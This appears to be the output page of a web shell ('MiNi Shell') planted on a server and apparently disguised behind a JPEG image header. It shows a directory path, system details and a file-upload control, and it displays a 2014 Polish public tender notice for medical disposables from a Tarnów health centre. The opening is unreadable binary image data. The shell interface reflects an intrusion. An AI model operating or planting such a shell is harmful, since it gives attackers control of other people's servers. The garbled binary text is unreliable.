JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/200536-N-2014.html

<p class="kh_header"><b>Tarnów: DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU DLA MOŚCICKIEGO CENTRUM MEDYCZNEGO SPÓŁKA Z OGRANICZONA ODPOWIEDZIALNOŚCIĄ</b><br>
<b>Numer ogłoszenia: 200536 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mościckie Centrum Medyczne Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kwiatkowskiego 15, 33-101 Tarnów, woj. małopolskie, tel. 14 68 80 511, faks 14 68 80 511.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Mościckie Centrum Medyczne Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU DLA MOŚCICKIEGO CENTRUM MEDYCZNEGO SPÓŁKA Z OGRANICZONA ODPOWIEDZIALNOŚCIĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sukcesywna dostawa materiałów i sprzętu jednorazowego użytku dla Mościckiego Centrum Medycznego Spółka z ograniczoną odpowiedzialnością w Tarnowie.
2.Sukcesywne zamawianie towaru określające ilość i asortyment odbywać się będzie telefonicznie lub faxem.
3.Dostawy odbywać się będą w uzgodnionych ilościach i asortymencie w ciągu 5 dni roboczych licząc od daty zgłoszenia zamówienia na koszt i ryzyko Wykonawcy.
4.Przyjęcie towaru następować będzie w magazynie Zamawiającego, po sprawdzeniu ilości i rodzaju dostarczonej asortymentu..
Pakiet nr 1
Lp. NAZWA MATERIAŁU	J.M.ILOŚĆ
1.IGŁA  0,5 X 25 A 100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	50
2. IGŁA 0,6 X 30  A 100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	15
3.IGŁA 0,7 X 40  A100SZT. Terumo lub równoważne pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.100
4.IGŁA 0,7 X 30 A 100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą op.10
5IGŁA O,8 X 40 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	40
6.IGŁA 0,9 X 40  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP. 50			
7.IGŁA1,1 X 40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	 5
8. IGŁA 0,5 X 16  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP. 5
9.IGŁA 0,9 X 50   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP. 3
10.1,2 X 40  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP. 20
11.IGŁA DO WSTRZYKIWACZY INSULINOWYCH JAŁOWE 0,30 X 8 MM pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą SZT.2400
12.STRZYKAWKA  100 ML JAŁOWA  NIEPIROGENNA do płukania uszu z łagodnym zakończeniem TYPU POLFA SZT. 1260
13. STRZYKAWKA 2 CZĘŚCIOWA  2 ML A 100SZT 
kontrastujący tłok
rozszerzona skala min. 20 PROCENT
pojedyncza skala pomiarowa	OP.80
14.STRZYKAWKA 2 CZĘŚCIOWA  5 ML A 100 SZT  
kontrastujący tłok 
rozszerzona skala min. 20 PROCENT
pojedyncza skala pomiarowa	OP.70
15.STRZYKAWKA  2 CZĘŚCIOWA  10 ML A 100 SZT 
 kontrastujący tłok
rozszerzona skala min. 20 PROCENT
pojedyncza skala pomiarowa OP.20
16. STRZYKAWKA  2 CZĘŚCIOWA  20 ML.A 100SZ 
 kontrastujący tłok 
rozszerzona skala min. 20 PROCENT
pojedyncza skala pomiarowa OP.25
17. STRZYKAWKA do pompy infuzyjnej NIE MNIEJ NIŻ 50 ML. I NIE WIĘCEJ NIŻ 60 ML. SZT.10
18.FARTUCH FLIZELINOWY 1 X UŻYTKU a 10 szt Op.10
19.PRZEŚCIERADŁO FLIZELINOWE 1 X UŻYTKU NIE MNIEJSZE NIŻ 210 X 140 SZT.	1800
20.MASECZKA 1 X UŻYTKU FLIZELINOWA Z GUMKĄ SZT. 1200
21. MOTYLKI 22G	SZT.	200
22.VENFLON 0,6 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu SZT.50
23.VENFLON 0,7 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu SZT.500
24.VENFLON 0,9 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu SZT.800			
25.VENFLON 1,1 wykonany z poliuretanu, posiadający min 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu
SZT.	500
26.VENFLON 1,3 wykonany z poliuretanu, posiadający min 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu SZT. 700
27.KORECZEK DO VENFLONU może posiadać trzpień zamykający światło kaniuli znajdujące się powyżej krawędzi koreczka.SZT.	500
28. Zamknięty system dostępu naczyniowego bezigłowy, bez metalowych oraz wewnętrzynych mechanicznych części, bez lateksu, umożliwiający połączenia typu Luer zapewniający używanie do 7 dni Szt. 250
29.KRANIK TRÓJDROŻNY DO VENFLONU SZT.200
30.ZATYCZKA DO CEWNIKA TYPU FOLLEY UNIWERSALNA POSIADAJĄCA  UCHWYT UŁATWIAJĄCY  PRAWIDŁOWE UMIESZCZENIE GO W ODPOWIEDNIM MIEJCSU SZT.50
31.PRZEDŁUŻACZ DO POMPY INFUZYJNEJ NIE KRÓTSZY NIŻ 120 CM-JAŁOWY NIEPIROGENNY, NIETOKSYCZNY SZT. 50
32.CEWNIK DO PODAWANIA TLENU PRZEZ NOS DLA DOROSŁYCH SZT.50
33.CEWNIK DO ODSYSANIA DLA DOROSŁYCH SZT. 100
34.CEWNIK ZEWNĘTRZNY Urologiczny NR 25 SZT. 20
35.DREN DO MASKI TLENOWEJ SZT.	10
36.KANKA DOODBYTNICZA DLA DOROS.NR 24 SZT.100			
37.ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS. CH 18 nie krótsze niż 800 mm SZT. 120
38.ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS.CH 16 SZT. 20
39.CEWNIK TYPU FOLLEYA NR 06 SZT. 10
40.CEWNIK TYPU FOLLEYA NR 08 SZT. 10
41.CEWNIK TYPU FOLLEYA NR 10 SZT. 10
42.CEWNIK TYPU FOLLEYA NR 12 SZT. 10
43.CEWNIK TYPU FOLLEYA NR 16 SZT. 40
44.CEWNIK TYPU FOLLEYA NR 18 SZT. 50
45.CEWNIK TYPU FOLLEYA NR 20 SZT. 70
46.CEWNIK TYPU FOLLEYA NR 22 SZT. 30
47.CEWNIK TYPU FOLLEYA NR 24 SZT. 20
48.CEWNIK TYPU FOLLEYA NR 26 SZT. 50
49.CEWNIK TYPU FOLLEYA NR 30 SZT. 20
50.KAPTUREK JEDNORAZOWY PLASTIKOWY DO TERMOMETRU Brown a 40 szt. Op.40
51.WOREK UROLOGICZNY 2L. jałowy	SZT. 500
52.WOREK UROLOGICZNY 750 ML. jałowy SZT. 10
53.KIELISZKI JEDNORAZOWE NA LEKI a 75 szt. OP. 150
54.Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy o 4 mm SZT.	1000
55.Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy o 2,5 mm SZT.	1000
56.PASKI DO STER.PARĄ WODNĄ DO PAKIETU NIE GORSZE NIŻ STEAM A 250SZT.	OP. 10
57.TAŚMA DO STER.PARĄ WODNĄ NA PAKIET a 1szt. OP. 4			
58.TOREB.PAPIER.FOLIA SAMOP.90x230a100szt. OP.10
59.TOREB.PAPIER.FOLIA SAMOP. 90x203a100szt.OP. 10
60.TOREB.PAPIER.FOLIA SAMOP.130x250 a100szt.OP. 10
61.TOREB.PAPIER.FOLIA SAMOP.90x130 a100szt.OP. 10
62.SZPATUŁKI  DO JĘZYKA drewniane A 100SZT. OP. 80
63.PENSETY JEDNORAZOWE jałowe SZT. 200
64.KUBKI NA MOCZ JAŁOWE nie mniej niż 100ML. Z ZAKĘTKĄ	SZT.	250
65.APARAT DO KROPÓWKI posiadające komorę wolną od PCV oraz pozbawione ftalanów SZT. 1600
66.SCALPEL JAŁOWY OSTRZE, UCHWYT NR 11 SZT.100
67.SCALPEL JAŁOWY OSTRZE, UCHWYT NR 12 SZT. 100
68.SCALPEL JAŁOWY OSTRZE, UCHWYT NR 13SZT. 100
69.OSTRZA STERYLNE WYMIENNE NR. 24 nie wymagany grawer z nazwą producenta na ostrzu OP. 1
70.OSTRZA STERYLNE WYMIENNE NR. 13 nie wymagany grawer z nazwą producenta na ostrzu OP.1
71.OSTRZA STERYLNE WYMIENNE NR. 23 nie wymagany grawer z nazwą producenta na ostrzu OP.1
72.OSTRZA STERYLNE WYMIENNE NR. 12 Z ZAKRZYWIONYM OSTRZEM nie wymagany grawer z nazwą producenta na ostrzu OP.	1
Pakiet nr 2
l.p.NAZWA ASORTYMENTU J.M. ILOŚĆ
1.Rękawice lateksowe diagnostyczne, pudrowe XS przeznaczone dla minimum średniego zagrożenia a 100 szt.  OP. 10
2.Rękawice lateksowe, diagnostyczne, pudrowane S  przeznaczone dla minimum średniego zagrożenia a100 szt. Op. 200
3.Rękawiczki lateksowe diagnostyczne, pudrowane  M przeznaczone dla minimum średniego zagrożenia a100 szt. Op. 100
4.Rękawiczki lateksowe diagnostyczne, pudrowane L przeznaczone dla minimum średniego zagrożenia a100 szt. Op.	200
5.Rękawice winylowe bezpudrowe S a100 szt. przeznaczone dla minimum średniego zagrożenia	OP. 300
6.Rękawice winylowe bezpudrowe M przeznaczone dla minimum średniego zagrożenia a100szt. OP. 900
7.Rękawice winylowe bezpudrowe L przeznaczone dla minimum średniego zagrożenia a100szt. OP. 250
8.Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe nr 8 pakowane po 2 szt.	PAR 100
9.Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe sterylne 7,5  PAR. 200
10.Rękawice pudrowane , lateksowe, chirurgiczne jałowe sterylne 6,5 PAR. 100
11.Rękawiczki nitrylowe S  bezpudrowe, diagnostyczne	 OP. 30
12.Rękawiczki nitrylowe M  bezpudrowe, diagnostyczne OP. 20
13. Rękawiczki nitrylowe L  bezpudrowe, diagnostyczne OP. 20
razem		
pakiet nr 3
NAZWA MATERIAŁU
J.M	ILOŚĆ
1.POJEMN. NA ODP.MED. 10 L. PLASTIK SZT. 200
2.POJEMN.NA ODP. MED.20L. PLASTIK SZT. 20
3.POJEMN.NA ODP.MED.5L. PLASTIK SZT. 200
4.POJEMN.NA ODP.MD.3,5L. PLASTIK	SZT. 100
5.POJEMN.NA ODP.MED. 2 L. PLASTIK SZT. 400
6.POJEMN.NA ODP.MED. 1 L. PLASTIK SZT. 50
7.POJEMN.NA ODP.MED. 0,7 L. PLASTIKSZT. 15
8.POJEMN.NA ODP.MED 250ML. PLASTIKSZT. 10
9.PUDEŁKA NA ODPADY 4L. TEKTURA	SZT. 10
razem		
Pakiet nr 4
LPMateriały diagnostyczne j.m. ilość
1.SZKIEŁKA NAKRYWKOWE 24 X 50MM TYPU MENZEL a 1000SZT. OP. 20
2.SZKIEŁKA PODSTAWOWE Z BIAŁYM POLEM TYPU MENZEL a 50 SZT. OP. 30
3.ŻEL DO USG A 500 ML.	SZT 100
4.ŻEL DO USG NIE GORSZY NIŻ SONOGEL A 5 l z pompką do aparatu LOGIQ 5 Expert	szt. 8
5.PAPIER DO EKG A 4 112 X 25 Z NADRUKIEM ROL 130
6.PAPIER DO EKG A 3 104 X 40 Z NADRUKIEM ROL 30
7.PAPIER DO EKG 110 X 40 Z NADRUKIEM ROL 15
8.WZIERNIKI GINEKOLOGICZNE NR 1	SZT.400
9.WZIERNIKI GINEKOL. NR 2 TYPU CUSCO	Szt. 1500
10.SZCZOTECZKA DO WYM. CYTOLOG.A 100SZT okrągła jałowa OP. 15
11.SZCZOTECZKA DO WYM. CYTOLOG.A 100SZT wachlarz jałowa OP.1
12.PAT.DO POB. WYM. CYTOLOG.A 100 SZT DREWNIANE JAŁOWE Z WACIKIEM nie krótsze niż 210 mm. OP. 18
razem		
Zamawiający dopuszcza możliwość odpowiedniego przeliczania zamawianych ilości na opakowania lub sztuki,  z zachowaniem tych ilości podanych w SIWZ
Zamawiający informuje, że podał w opisie igieł typu Terumo, ponieważ na podstawie wieloletniego doświadczenia i opinii pacjentów uważa, że są one wysokiej jakości i spełniają oczekiwania Zamawiającego oraz pacjentów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- posiadania wiedzy i doświadczenia;
- dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- sytuacji ekonomicznej i finansowej.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- posiadania wiedzy i doświadczenia;
- dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- sytuacji ekonomicznej i finansowej.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- posiadania wiedzy i doświadczenia;
- dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- sytuacji ekonomicznej i finansowej.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- posiadania wiedzy i doświadczenia;
- dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- sytuacji ekonomicznej i finansowej.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
- posiadania wiedzy i doświadczenia;
- dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
- sytuacji ekonomicznej i finansowej.
Ocena spełnienia powyższego warunku, będzie dokonywana metodą 0 - 1, tj. spełnia, nie spełnia w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Inne oświadczenia i dokumenty, które Wykonawca zobowiązany jest dołączyć do oferty

1. Załącznik Nr 1 - Wypełniony i podpisany formularz ofertowy.
2. Załącznik Nr 2 - Oświadczenie.
3. Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika.
